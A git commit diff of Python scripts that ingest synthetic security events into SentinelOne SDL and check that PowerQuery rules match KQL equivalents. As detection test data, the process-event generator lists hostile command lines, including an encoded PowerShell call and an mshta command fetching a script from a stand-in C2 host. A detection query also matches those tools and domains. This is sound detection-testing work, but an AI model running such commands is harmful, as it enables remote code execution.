Initial commit: KQL ↔ SDL PowerQuery proof of equivalence

This commit is contained in:
marc
2026-06-01 09:57:14 +02:00
commit 23cbaa9c08
91 changed files with 5966 additions and 0 deletions
+34
View File
@@ -0,0 +1,34 @@
#!/usr/bin/env python3
"""Count duplicate timestamps within the generated JSONL.
SDL appears to dedupe addEvents by (session, ts) - events sharing a ts
within the same session are silently dropped. If our generator emits many
events at colliding ts_epoch_ms values, only one of each cluster survives.
"""
import json
from collections import Counter, defaultdict
from pathlib import Path
JSONL = Path(__file__).resolve().parents[1] / "sample_data" / "events.jsonl"
per_type_total = Counter()
per_type_unique = defaultdict(set)
per_type_max_collision = defaultdict(int)
with JSONL.open() as f:
for line in f:
r = json.loads(line)
et = r["event_type"]
ts = r["ts_epoch_ms"]
per_type_total[et] += 1
per_type_unique[et].add(ts)
print(f"{'event_type':30s} {'events':>8} {'uniq_ts':>8} {'collision_loss%':>16}")
print("-" * 70)
for et in sorted(per_type_total):
n = per_type_total[et]
u = len(per_type_unique[et])
loss = 100 * (n - u) / n if n else 0
print(f"{et:30s} {n:>8} {u:>8} {loss:>15.1f}%")
print("-" * 70)
print(f"{'TOTAL':30s} {sum(per_type_total.values()):>8} "
f"{sum(len(s) for s in per_type_unique.values()):>8}")
+101
View File
@@ -0,0 +1,101 @@
#!/usr/bin/env python3
"""Diagnose why most of our 445 generated events are not queryable in SDL.
Strategy:
1. Take 5 CommonSecurityLog events straight from the generated JSONL,
decorate them with a unique probe marker, and ingest as a single batch.
2. Wait 10 s for indexing.
3. Query for the marker to confirm they are queryable.
4. Then bulk-ingest the entire JSONL and report per-event-type counts in SDL
vs counts in the local file - to expose where the loss happens.
"""
from __future__ import annotations
import json
import sys
import time
from collections import Counter
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query, ingest_jsonl, _clean_attrs # noqa: E402
JSONL = ROOT / "sample_data" / "events.jsonl"
MARKER = f"loss-probe-{int(time.time())}"
# ---------------------------------------------------------------------------
# Step 1: per-type counts in the local file
# ---------------------------------------------------------------------------
local_counts = Counter()
with JSONL.open() as f:
for line in f:
rec = json.loads(line)
local_counts[rec["event_type"]] += 1
print("=" * 80)
print("Local JSONL event_type counts")
print("=" * 80)
for k, v in sorted(local_counts.items()):
print(f" {k:30s} {v}")
print(f" {'TOTAL':30s} {sum(local_counts.values())}")
# ---------------------------------------------------------------------------
# Step 2: pick 5 CSL events from disk, mark them, ingest, query
# ---------------------------------------------------------------------------
csl_events = []
with JSONL.open() as f:
for line in f:
rec = json.loads(line)
if rec["event_type"] == "CommonSecurityLog":
rec["loss_marker"] = MARKER
ts_ms = int(rec["ts_epoch_ms"])
cleaned = _clean_attrs(rec)
csl_events.append({"ts": str(ts_ms * 1_000_000), "sev": 3,
"thread": "T1", "attrs": cleaned})
if len(csl_events) >= 5:
break
print()
print("=" * 80)
print(f"Step 2: ingesting 5 marker-tagged CSL events ({MARKER})")
print("=" * 80)
r = add_events(csl_events)
print(f"addEvents -> {json.dumps(r)}")
print("waiting 10 s for indexing ...")
time.sleep(10)
probe_q = f"loss_marker='{MARKER}' | group n = count() by event_type"
r = power_query(probe_q, "1h")
print(f"probe query (1h) -> matching={r.get('matchingEvents')}, rows={r.get('values')}")
# ---------------------------------------------------------------------------
# Step 3: full bulk ingest of the file via the harness helper
# ---------------------------------------------------------------------------
print()
print("=" * 80)
print("Step 3: full bulk ingest of every event in JSONL")
print("=" * 80)
sent = ingest_jsonl(JSONL)
print(f"ingest_jsonl reports {sent} events sent")
print("waiting 20 s for indexing ...")
time.sleep(20)
# ---------------------------------------------------------------------------
# Step 4: per-event-type count in SDL
# ---------------------------------------------------------------------------
print()
print("=" * 80)
print("Step 4: SDL counts by event_type")
print("=" * 80)
print(f"{'event_type':30s} {'local':>8} {'SDL':>8} {'loss%':>8}")
print("-" * 60)
for et in sorted(local_counts):
q = f"event_type='{et}' | group n = count()"
r = power_query(q, "1h")
sdl_n = 0
if r.get("values"):
sdl_n = int(r["values"][0][0] or 0)
local_n = local_counts[et]
loss = 100 * (local_n - sdl_n) / local_n if local_n else 0
print(f"{et:30s} {local_n:>8} {sdl_n:>8} {loss:>7.0f}%")
+46
View File
@@ -0,0 +1,46 @@
#!/usr/bin/env python3
"""Probe what data is actually queryable in SDL after ingestion."""
from __future__ import annotations
import json
import sys
import time
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
from harness.sdl_client import power_query # noqa: E402
QUERIES = [
("any serverHost=kql-proof",
"serverHost='kql-proof' | columns event_type, UserPrincipalName, ts_epoch_ms | limit 5"),
("count by event_type",
"serverHost='kql-proof' | group n=count() by event_type"),
("SigninLogs by user",
"serverHost='kql-proof' event_type='SigninLogs' | group n=count() by UserPrincipalName"),
("SigninLogs min/max ts_epoch_ms",
"serverHost='kql-proof' event_type='SigninLogs' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
("recent SigninLogs (no time filter)",
"serverHost='kql-proof' event_type='SigninLogs' Location='RU' | columns UserPrincipalName, Location | limit 10"),
("SecurityEvent EventID column type",
"serverHost='kql-proof' event_type='SecurityEvent' | columns EventID, NewProcessName | limit 5"),
("Audit OperationName",
"serverHost='kql-proof' event_type='AuditLogs' | columns OperationName | limit 10"),
]
for name, q in QUERIES:
print("=" * 80)
print(f"# {name}")
print(f" query: {q}")
t = time.time()
r = power_query(q, start_time="30d")
rows = r.get("values") or []
cols = [c.get("name") if isinstance(c, dict) else c
for c in (r.get("columns") or [])]
print(f" status={r.get('status')} matching={r.get('matchingEvents')} "
f"rows={len(rows)} took={time.time()-t:.1f}s")
if r.get("status", "").startswith("error/"):
print(f" ERROR_BODY: {json.dumps(r, indent=2)[:800]}")
if rows:
print(f" cols: {cols}")
for row in rows[:5]:
print(" ", dict(zip(cols, row)))
+40
View File
@@ -0,0 +1,40 @@
#!/usr/bin/env python3
"""Wider probe: try a variety of filters and start windows to find our data."""
import sys, time, json
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
from harness.sdl_client import power_query
QUERIES = [
("event_type=SigninLogs 7d (no serverHost)",
"event_type='SigninLogs' | columns UserPrincipalName | limit 5", "7d"),
("event_type=SigninLogs 1h",
"event_type='SigninLogs' | columns UserPrincipalName, ts_epoch_ms | limit 5", "1h"),
("UserPrincipalName matching contoso",
"UserPrincipalName='alice@contoso.com' | columns event_type, UserPrincipalName | limit 5", "1d"),
("anything from xdr tenant 1h",
"* | columns event_type, serverHost, logfile | limit 5", "1h"),
("logfile contains kql-proof",
"logfile contains 'kql-proof' | columns event_type | limit 5", "7d"),
("contoso.com in attrs",
"Identity contains 'contoso.com' | columns event_type, Identity | limit 5", "1d"),
("test: count any events tenant-wide 5m",
"* | group n=count()", "5m"),
]
for name, q, window in QUERIES:
print("=" * 80)
print(f"# {name} (start={window})")
print(f" q: {q}")
t = time.time()
r = power_query(q, start_time=window)
rows = r.get("values") or []
cols = [c.get("name") if isinstance(c, dict) else c
for c in (r.get("columns") or [])]
print(f" status={r.get('status')} matching={r.get('matchingEvents')} "
f"rows={len(rows)} took={time.time()-t:.1f}s")
if r.get("status", "").startswith("error/"):
print(f" ERROR: {json.dumps(r)[:500]}")
if rows:
for row in rows[:5]:
print(" ", dict(zip(cols, row)))
+198
View File
@@ -0,0 +1,198 @@
#!/usr/bin/env python3
"""Export each rule's KQL and PowerQuery to disk.
The exported `.pq` files are:
* SELF-CONTAINED and RUNNABLE — every template placeholder
(`{RECENT_MS}`) is substituted with a concrete value from the
current time anchor, so you can paste straight into SDL.
* PRETTY-PRINTED — one pipeline stage per line with continuation
indents, matching the style in pmoses-s1/claude-skills.
* HEADER-DECORATED — a `//`-comment block names the rule, describes
intent, lists field references, and tells the reader what
`startTime` to use when running the query.
* VALIDATED — after writing, every `.pq` is parsed for known
anti-patterns from the SentinelOne PowerQuery skill's pitfalls
list (literal `{` braces, deprecated `first()`/`last()`/
`percentile()`, leading `*` filter, missing leading pipe before
`join`/`union`, etc.). Errors abort the export so the published
repo never contains broken queries.
"""
from __future__ import annotations
import json
import re
import sys
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from rules import RULES, NOW, RECENT_START, BASELINE_START # noqa: E402
# ---------------------------------------------------------------------------
# Pretty-printer: turn a single-line PQ string into multi-line idiomatic form.
# ---------------------------------------------------------------------------
def pretty(pq: str) -> str:
"""Break a one-line PQ into idiomatic multi-line form.
Rule: every `|` that introduces a stage starts a new line; multi-clause
`group ... by ...` is split so each agg sits on its own indented line
and `by ...` lines up under `group`.
"""
# Normalise whitespace
pq = re.sub(r"\s+", " ", pq).strip()
# Split on " | " into stages, but keep the leading initial filter
parts = pq.split(" | ")
head, stages = parts[0].strip(), [s.strip() for s in parts[1:]]
lines: list[str] = [head] if head else []
for s in stages:
# Break a long `group a=count(), b=sum(x) by f1, f2` into multi-line.
m = re.match(
r"^group\s+(.+?)\s+by\s+(.+)$", s, flags=re.IGNORECASE | re.DOTALL)
if m:
aggs_raw, bys = m.group(1), m.group(2)
# Split aggs on commas NOT inside parentheses
aggs = _split_top_level_commas(aggs_raw)
lines.append("| group " + aggs[0].strip() + ("," if len(aggs) > 1 else ""))
for a in aggs[1:-1]:
lines.append(" " + a.strip() + ",")
if len(aggs) > 1:
lines.append(" " + aggs[-1].strip())
lines.append(" by " + bys.strip())
continue
# Default: one stage per line
lines.append("| " + s)
return "\n".join(lines)
def _split_top_level_commas(s: str) -> list[str]:
out: list[str] = []
depth, cur = 0, []
for ch in s:
if ch == "(":
depth += 1; cur.append(ch)
elif ch == ")":
depth -= 1; cur.append(ch)
elif ch == "," and depth == 0:
out.append("".join(cur)); cur = []
else:
cur.append(ch)
if cur:
out.append("".join(cur))
return out
# ---------------------------------------------------------------------------
# Anti-pattern scanner — refuses to write a file containing known landmines.
# ---------------------------------------------------------------------------
PITFALLS: list[tuple[str, str]] = [
(r"\{[A-Za-z_]+\}",
"Unsubstituted template placeholder (e.g. {RECENT_MS}). "
"Substitute before writing."),
(r"\bfirst\s*\(",
"first(x) is unreliable — use min_by(x, ts_epoch_ms)."),
(r"\blast\s*\(",
"last(x) is unreliable — use max_by(x, ts_epoch_ms)."),
(r"\bpercentile\s*\(",
"percentile(x, N) is not a real function — use p50/p95/p99."),
(r"\bgroup_unique_values\s*\(",
"group_unique_values does not exist — use array_agg_distinct(x, N)."),
(r"(?m)^\s*\*\s*(\||$)",
"Bare `*` as initial filter returns 500 — use `| limit 5` or "
"`field = *`."),
(r"(?m)^\s*(join|union)\b",
"join/union must start with a leading `|`."),
(r"(?m)^\s*#(cmdline|name|hash|ip|storylineid|username|dns)\b",
"Shortcut fields (#cmdline, …) are unreliable across tenants — "
"use the explicit field name."),
]
def scan(text: str) -> list[str]:
return [msg for pat, msg in PITFALLS if re.search(pat, text)]
# ---------------------------------------------------------------------------
# Header builder
# ---------------------------------------------------------------------------
def header(rule: dict, recent_iso: str, now_iso: str) -> str:
field_refs = sorted({f for f in re.findall(
r"\b[A-Z][A-Za-z0-9_]+\b", rule["pq"])
if f.lower() not in {"and", "or", "not", "true", "false",
"filter", "group", "by", "let", "columns",
"sort", "limit", "join", "union", "in",
"contains", "matches"}})
lines = [
f"// Rule: {rule['id']}",
f"// {rule['description']}",
f"//",
"// Source KQL: see ../kql/" + rule['id'] + ".kql",
"//",
"// HOW TO RUN",
"// curl POST {sdl}/api/powerQuery with this body, OR paste in",
"// the SDL console. Set startTime = '2h' (or wider) so the API",
"// scans the freshly-ingested epochs that contain the events.",
"//",
f"// Time anchor at export: NOW = {now_iso}",
f"// Recent-window cutoff: {recent_iso}",
"// (`ts_epoch_ms` below is that cutoff expressed in ms.",
"// Re-run harness/export_rules.py to refresh after regenerating",
"// sample_data/events.jsonl.)",
"//",
"// Fields referenced: " + ", ".join(field_refs[:10])
+ ("" if len(field_refs) > 10 else ""),
"//",
"// EDITING NOTE",
"// Every line that starts with `|` is a pipeline stage. Each `|`",
"// is REQUIRED. If you delete one (e.g. while changing a literal",
"// on the same line as a stage), SDL re-parses the keyword that",
"// follows as a search term and rejects the query with errors",
"// like `'estimate_distinct' is a grouping function`.",
]
return "\n".join(lines) + "\n"
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main() -> None:
recent_ms = int(RECENT_START.timestamp() * 1000)
recent_iso = RECENT_START.isoformat()
now_iso = NOW.isoformat()
failures: list[tuple[str, list[str]]] = []
for r in RULES:
# 1. substitute placeholders
body = r["pq"].replace("{RECENT_MS}", str(recent_ms))
# 2. pretty-print
body = pretty(body)
# 3. scan
bad = scan(body)
if bad:
failures.append((r["id"], bad))
continue
# 4. write
text = header(r, recent_iso, now_iso) + "\n" + body + "\n"
(ROOT / "pq" / f"{r['id']}.pq").write_text(text)
# Mirror the .kql (verbatim, no substitution)
(ROOT / "kql" / f"{r['id']}.kql").write_text(r["kql"].strip() + "\n")
if failures:
print("✗ Export failed — anti-patterns detected:")
for rid, msgs in failures:
print(f" {rid}")
for m in msgs:
print(f" - {m}")
sys.exit(1)
print(f"✓ Exported {len(RULES)} rules to kql/ and pq/")
print(f" (RECENT_MS = {recent_ms} = {recent_iso})")
if __name__ == "__main__":
main()
+39
View File
@@ -0,0 +1,39 @@
#!/usr/bin/env python3
"""Find SDL's age cutoff for addEvents by sending probe events at increasing
ages and seeing which ones become queryable."""
import json, sys, time, uuid
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query
TS_NOW_MS = int(time.time() * 1000)
PROBE = uuid.uuid4().hex[:8]
# 30s, 5min, 30min, 1h, 2h, 4h, 6h, 12h, 24h
ages_min = [0.5, 5, 30, 60, 120, 240, 360, 720, 1440]
events = []
for i, age in enumerate(ages_min):
ts_ms = TS_NOW_MS - int(age * 60 * 1000)
events.append({
"ts": str(ts_ms * 1_000_000), "sev": 3, "thread": "T1",
"attrs": {"event_type": "CommonSecurityLog",
"probe": f"{PROBE}_{i:02d}", "age_min": age},
})
print(f"Sending {len(events)} events at ages {ages_min} min")
r = add_events(events)
print(f"addEvents -> {json.dumps(r)}")
print("\nWaiting 12 s ...")
time.sleep(12)
print(f"\nQuerying probe '{PROBE}' over last 48h ...")
res = power_query(f"probe contains '{PROBE}' | columns probe, age_min | limit 100", "48h")
n = res.get("matchingEvents", 0)
vals = res.get("values") or []
print(f"matching={n}")
got = {row[1] for row in vals}
print(f"\n{'age_min':>8} {'sent':>6} {'queryable':>10}")
for age in ages_min:
landed = "YES" if age in got else "NO"
print(f" {age:>6} {'yes':>6} {landed:>10}")
+40
View File
@@ -0,0 +1,40 @@
#!/usr/bin/env python3
"""Send one event per batch (separate addEvents call) at different ages,
each with a fresh session. This isolates whether SDL is rejecting based on
mixed-age batches or just on event age."""
import json, sys, time, uuid, importlib
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
PROBE = uuid.uuid4().hex[:8]
ages_min = [0.5, 5, 30, 60, 120, 240, 480, 720, 1440]
# Force a fresh session for *every* probe so we eliminate session dedup
import harness.sdl_client as sdl
results = []
for i, age in enumerate(ages_min):
importlib.reload(sdl) # re-roll the SESSION UUID
ts_ms = int(time.time() * 1000) - int(age * 60 * 1000)
pv = f"{PROBE}_{i:02d}"
ev = {"ts": str(ts_ms * 1_000_000), "sev": 3, "thread": "T1",
"attrs": {"event_type": "CommonSecurityLog", "probe": pv,
"age_min": age}}
r = sdl.add_events([ev])
print(f"age={age:>6} min session={sdl.SESSION[-12:]} addEvents={r}")
results.append((age, pv))
print("\nWaiting 12 s ...")
time.sleep(12)
q = f"probe contains '{PROBE}' | columns probe, age_min | limit 100"
res = sdl.power_query(q, "48h")
n = res.get("matchingEvents", 0)
vals = res.get("values") or []
print(f"\nQuery matching={n}")
got = {row[1] for row in vals}
print(f"\n{'age_min':>8} {'queryable':>10}")
for age, _ in results:
landed = "YES" if age in got else "NO"
print(f" {age:>6} {landed:>10}")
+220
View File
@@ -0,0 +1,220 @@
"""Ingest realistic events to SDL to exercise the 3-way join PowerQuery:
identity sign_in failures x suspicious DNS x suspicious process_start
Joined on (user_name) and (host). Events are spread across the last 4 hours.
"""
from __future__ import annotations
import random
import time
from pathlib import Path
import sys
ROOT = Path(__file__).resolve().parent
sys.path.insert(0, str(ROOT))
from sdl_client import add_events, power_query # noqa: E402
NOW_MS = int(time.time() * 1000)
WINDOW_MS = 4 * 60 * 60 * 1000 # 4h
# --- Personas that will land in ALL 3 streams (these will join) --------------
JOIN_TARGETS = [
# (user, host)
("alice.smith", "wks-alice-01"),
("bob.jones", "wks-bob-02"),
("carol.nguyen", "wks-carol-03"),
]
# Users that only fail logins (no DNS/proc match) → in failed-only
NOISE_FAILED_USERS = ["dave.kim", "erin.lopez", "frank.singh"]
# Hosts that have suspicious procs but no DNS hit → noise on proc side
NOISE_PROC_HOSTS = ["srv-build-01", "srv-jenkins-02"]
SUSPECT_DOMAINS = ["c2.example.net", "suspect.example.org", "c2.example.io"]
BENIGN_DOMAINS = ["microsoft.com", "google.com", "github.com"]
SUSPECT_CMDS = [
"powershell.exe -enc SQBFAFgAIA==",
"rundll32.exe shell32.dll,Control_RunDLL",
"mshta.exe http://c2.example.net/x.hta",
]
BENIGN_CMDS = ["explorer.exe", "chrome.exe --no-sandbox", "code.exe"]
def rand_ts() -> str:
"""Random ns-epoch timestamp string within the last 4h."""
ms = NOW_MS - random.randint(0, WINDOW_MS - 1)
return str(ms * 1_000_000)
def evt(ts_ns: str, attrs: dict) -> dict:
return {"ts": ts_ns, "sev": 3, "attrs": attrs, "thread": "T1"}
def gen_failed_signins() -> list[dict]:
out = []
# Users in JOIN_TARGETS get many failures (so they "stand out")
for user, _ in JOIN_TARGETS:
for _ in range(random.randint(8, 15)):
out.append(evt(rand_ts(), {
"dataSource.category": "identity",
"dataSource.vendor": "azure-ad",
"activity_name": "sign_in",
"status": "failure",
"user.name": user,
"src_endpoint.ip": f"203.0.113.{random.randint(2,254)}",
}))
# Noise: failed-only users
for user in NOISE_FAILED_USERS:
for _ in range(random.randint(2, 6)):
out.append(evt(rand_ts(), {
"dataSource.category": "identity",
"dataSource.vendor": "azure-ad",
"activity_name": "sign_in",
"status": "failure",
"user.name": user,
}))
# Some successes (should be filtered out by status='failure')
for user, _ in JOIN_TARGETS:
for _ in range(3):
out.append(evt(rand_ts(), {
"dataSource.category": "identity",
"dataSource.vendor": "azure-ad",
"activity_name": "sign_in",
"status": "success",
"user.name": user,
}))
return out
def gen_dns() -> list[dict]:
out = []
for user, host in JOIN_TARGETS:
# suspicious DNS for these users on their hosts
for _ in range(random.randint(3, 6)):
out.append(evt(rand_ts(), {
"dataSource.category": "network",
"dataSource.vendor": "zeek",
"activity_name": "dns_query",
"user.name": user,
"device.hostname": host,
"dns.question.name": random.choice(SUSPECT_DOMAINS),
}))
# benign DNS noise from same users
for _ in range(5):
out.append(evt(rand_ts(), {
"dataSource.category": "network",
"dataSource.vendor": "zeek",
"activity_name": "dns_query",
"user.name": user,
"device.hostname": host,
"dns.question.name": random.choice(BENIGN_DOMAINS),
}))
# Noise: suspicious DNS for users NOT in JOIN_TARGETS (won't join failed)
for user in ["greg.wu", "helen.park"]:
for _ in range(3):
out.append(evt(rand_ts(), {
"dataSource.category": "network",
"dataSource.vendor": "zeek",
"activity_name": "dns_query",
"user.name": user,
"device.hostname": f"wks-{user.split('.')[0]}-99",
"dns.question.name": random.choice(SUSPECT_DOMAINS),
}))
return out
def gen_process() -> list[dict]:
out = []
for _, host in JOIN_TARGETS:
for _ in range(random.randint(4, 8)):
out.append(evt(rand_ts(), {
"dataSource.category": "process",
"dataSource.vendor": "sentinelone",
"activity_name": "process_start",
"device.hostname": host,
"process.cmd_line": random.choice(SUSPECT_CMDS),
}))
# benign procs on the same hosts
for _ in range(5):
out.append(evt(rand_ts(), {
"dataSource.category": "process",
"dataSource.vendor": "sentinelone",
"activity_name": "process_start",
"device.hostname": host,
"process.cmd_line": random.choice(BENIGN_CMDS),
}))
# Noise: suspicious procs on hosts that don't appear in DNS stream
for host in NOISE_PROC_HOSTS:
for _ in range(3):
out.append(evt(rand_ts(), {
"dataSource.category": "process",
"dataSource.vendor": "sentinelone",
"activity_name": "process_start",
"device.hostname": host,
"process.cmd_line": random.choice(SUSPECT_CMDS),
}))
return out
def chunked(seq: list, n: int):
for i in range(0, len(seq), n):
yield seq[i:i + n]
def main() -> None:
random.seed(42)
events = gen_failed_signins() + gen_dns() + gen_process()
random.shuffle(events)
print(f"Generated {len(events)} events across the last 4h")
sent = 0
for batch in chunked(events, 200):
r = add_events(batch, session_info={
"serverHost": "join-demo",
"logfile": "join-demo.jsonl",
"parser": "json",
})
if r.get("status") != "success":
raise RuntimeError(f"addEvents failed: {r}")
sent += len(batch)
print(f" ingested {sent}/{len(events)}")
time.sleep(0.25)
print(f"Done. {sent} events ingested.")
# Quick verification: run the user's PowerQuery against last 4h
pq = r'''| join
failed = (
dataSource.category = 'identity' AND activity_name = 'sign_in' AND status = 'failure'
| columns user_name = user.name
| group failed_signins = count() by user_name
),
dns = (
dataSource.category = 'network' AND activity_name = 'dns_query'
AND dns.question.name matches "(c2|suspect)\.example\."
| columns user_name = user.name, host = device.hostname, dns_name = dns.question.name
),
proc = (
dataSource.category = 'process' AND activity_name = 'process_start'
AND process.cmd_line matches "(powershell|rundll32|mshta)"
| columns host = device.hostname, cmd_line = process.cmd_line
)
on failed.user_name = dns.user_name, dns.host = proc.host'''
print("\nWaiting 20s for SDL indexing, then running the join...")
time.sleep(20)
res = power_query(pq, start_time="4h")
if isinstance(res, dict):
matches = res.get("matches") or res.get("data") or res.get("results")
print(f"PowerQuery response keys: {list(res.keys())}")
if matches is not None:
print(f"Match count: {len(matches) if hasattr(matches, '__len__') else matches}")
else:
print(res)
else:
print(res)
if __name__ == "__main__":
main()
+42
View File
@@ -0,0 +1,42 @@
#!/usr/bin/env python3
"""After bash run_proof.sh, check what's queryable for the latest run."""
import sys, json, time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query
# Look at the latest proof_run_id from the log
log = (ROOT / "reports" / "run.log").read_text()
import re
m = re.search(r"proof_run_id=([A-Za-z0-9-]+)", log)
RUN_ID = m.group(1) if m else None
print(f"Latest proof_run_id from log: {RUN_ID}")
QUERIES = [
"any event for this run",
f"proof_run_id='{RUN_ID}' | group n=count()",
"by event_type for this run",
f"proof_run_id='{RUN_ID}' | group n=count() by event_type",
"all kql-proof logfile (any run)",
"logfile contains 'kql-proof' | group n=count() by event_type",
"rule 1 raw query that errors",
f"proof_run_id='{RUN_ID}' event_type='SigninLogs' | filter ts_epoch_ms >= 0 "
"| group LocationCount = estimate_distinct(Location), "
"LocationList = group_unique_values(Location), LogonCount = count() "
"by UserPrincipalName, AppDisplayName | filter LocationCount >= 3",
]
for label_or_q in zip(QUERIES[0::2], QUERIES[1::2]):
label, q = label_or_q
print()
print("=" * 80)
print(f"# {label}")
print(f" q: {q}")
t = time.time()
r = power_query(q, "1h")
print(f" status={r.get('status')} matching={r.get('matchingEvents')} took={time.time()-t:.1f}s")
if r.get("status", "").startswith("error/"):
print(f" ERROR: {json.dumps(r)[:600]}")
for row in (r.get("values") or [])[:10]:
cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
print(" ", dict(zip(cols, row)))
+92
View File
@@ -0,0 +1,92 @@
#!/usr/bin/env python3
"""Probe: does SDL index JSON keys that contain literal dots?
If yes, we can ship synthetic OCSF events with keys like
`"event.category": "logins"` and query them with the same dotted
syntax the published runnable example uses, keeping the OCSF
look-and-feel without needing a server-side parser to flatten
nested objects.
"""
from __future__ import annotations
import json
import sys
import time
import uuid
from datetime import datetime, timedelta, timezone
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import upload_logs, power_query # noqa: E402
def main() -> int:
run_id = f"dot-probe-{uuid.uuid4().hex[:8]}"
now = datetime.now(timezone.utc).replace(microsecond=0)
ts_ms = int((now - timedelta(seconds=30)).timestamp() * 1000)
e = {
"TimeGenerated": now.strftime("%Y-%m-%dT%H:%M:%S.000Z"),
"ts_epoch_ms": ts_ms,
"proof_run_id": run_id,
# literal dots in the key (NOT nested objects)
"event.category": "logins",
"event.login.userName": "alice@contoso.com",
"event.login.loginIsSuccessful": False,
"endpoint.name": "host-alpha",
}
r = upload_logs(json.dumps(e))
print("upload:", r.get("status"))
print("indexing", end="", flush=True)
n = 0
for _ in range(20):
time.sleep(2)
rr = power_query(f"proof_run_id='{run_id}' | group n=count()", "5m")
vals = rr.get("values") or []
n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
print(f" {n}", end="", flush=True)
if n >= 1:
break
print()
if n == 0:
print("event did not become queryable; aborting")
return 1
probes = [
("filter event.category",
f"proof_run_id='{run_id}' AND event.category='logins' | limit 2"),
("project event.category",
f"proof_run_id='{run_id}' | columns c=event.category | limit 2"),
("project endpoint.name",
f"proof_run_id='{run_id}' | columns h=endpoint.name | limit 2"),
("project event.login.userName",
f"proof_run_id='{run_id}' | columns u=event.login.userName | limit 2"),
("filter event.login.loginIsSuccessful",
f"proof_run_id='{run_id}' AND event.login.loginIsSuccessful='false' | limit 2"),
("bracket access",
f"proof_run_id='{run_id}' AND \"event.category\"='logins' | limit 2"),
("see all top-level cols of one row",
f"proof_run_id='{run_id}' | limit 1"),
]
for label, q in probes:
r = power_query(q, "5m")
status = r.get("status")
matching = r.get("matchingEvents")
msg = (r.get("message") or "")[:140]
print(f"\n[{label}]")
print(f" q : {q}")
print(f" status: {status} matching: {matching} msg: {msg}")
cols = r.get("columns") or []
col_names = [c.get("name") if isinstance(c, dict) else c for c in cols]
print(f" cols : {col_names}")
for v in (r.get("values") or [])[:2]:
v_str = str(v)
print(f" val : {v_str[:200]}")
return 0
if __name__ == "__main__":
sys.exit(main())
+60
View File
@@ -0,0 +1,60 @@
#!/usr/bin/env python3
"""Compare the EXACT addEvents payload used by ingest_jsonl with a known-good
manual one. Add a unique probe marker so we can tell whether it actually
landed in SDL."""
from __future__ import annotations
import json
import sys
import time
import uuid
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query, _clean_attrs # noqa: E402
JSONL = ROOT / "sample_data" / "events.jsonl"
PROBE = uuid.uuid4().hex[:8]
# Take the first 3 lines of JSONL, decorate with probe, send via the SAME
# code path as ingest_jsonl does (but inlined here so we can print everything).
events = []
with JSONL.open() as f:
for line in f:
if len(events) >= 3:
break
rec = json.loads(line)
rec["probe"] = f"{PROBE}_{len(events)}"
ts_ms = int(rec["ts_epoch_ms"])
attrs = _clean_attrs(rec)
events.append({"ts": str(ts_ms * 1_000_000), "sev": 3,
"thread": "T1", "attrs": attrs})
print(f"=== Payload ({len(events)} events) ===")
print(json.dumps(events, indent=2, default=str)[:3000])
print()
print(f"=== Submitting (probe prefix={PROBE}) ===")
r = add_events(events)
print(f"addEvents -> {json.dumps(r)}")
print("\nWaiting 12 s for indexing ...")
time.sleep(12)
q = f"probe contains '{PROBE}' | columns event_type, probe, ts_epoch_ms | limit 10"
print(f"\nQuery: {q}")
res = power_query(q, "10m")
print(f"Result -> matching={res.get('matchingEvents')}")
for row in res.get("values") or []:
print(" ", row)
# Also: show TS skew vs real now
import datetime as dt
real_now_ms = int(time.time() * 1000)
print(f"\nreal_now_ms = {real_now_ms}")
for e in events:
ts_ns = int(e["ts"])
ts_ms = ts_ns // 1_000_000
age_min = (real_now_ms - ts_ms) / 60000
print(f" event ts_ms={ts_ms} age={age_min:.2f} min attrs.event_type={e['attrs']['event_type']}")
+85
View File
@@ -0,0 +1,85 @@
#!/usr/bin/env python3
"""Find out what attribute(s) in our generated events cause SDL to reject them.
Send increasingly complex events under unique markers and see which ones
SDL accepts (queryable within 10s) vs silently drops.
"""
from __future__ import annotations
import json
import sys
import time
import uuid
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query, _clean_attrs # noqa: E402
TS_NOW_MS = int(time.time() * 1000)
def mk(attrs: dict, offset_sec: int = 0):
return {
"ts": str((TS_NOW_MS - offset_sec * 1000) * 1_000_000),
"sev": 3, "thread": "T1",
"attrs": attrs,
}
PROBE = uuid.uuid4().hex[:8]
cases = [
("A_minimal_2_attrs",
mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_A"}, 60)),
("B_one_int_attr",
mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_B",
"SentBytes": 2048}, 55)),
("C_one_negative_int",
mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_C",
"SentBytes": 2048, "LogSeverity": 5}, 50)),
("D_with_special_chars",
mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_D",
"Message": "allow web access to 142.250.74.110 port 443"}, 45)),
("E_with_backslashes",
mk({"event_type": "SecurityEvent", "probe": f"{PROBE}_E",
"NewProcessName": "C:\\Windows\\System32\\svchost.exe"}, 40)),
("F_realistic_csl_via_clean",
mk(_clean_attrs({
"event_type": "CommonSecurityLog", "probe": f"{PROBE}_F",
"TimeGenerated": "2026-05-31T16:50:00.000Z",
"ts_epoch_ms": TS_NOW_MS - 30000,
"DeviceVendor": "Palo Alto Networks", "Activity": "TRAFFIC",
"DeviceName": "pa-fw-01", "SourceUserID": "alice",
"SourceIP": "10.0.1.10", "SourcePort": 49000,
"DestinationIP": "142.250.74.110", "DestinationPort": 443,
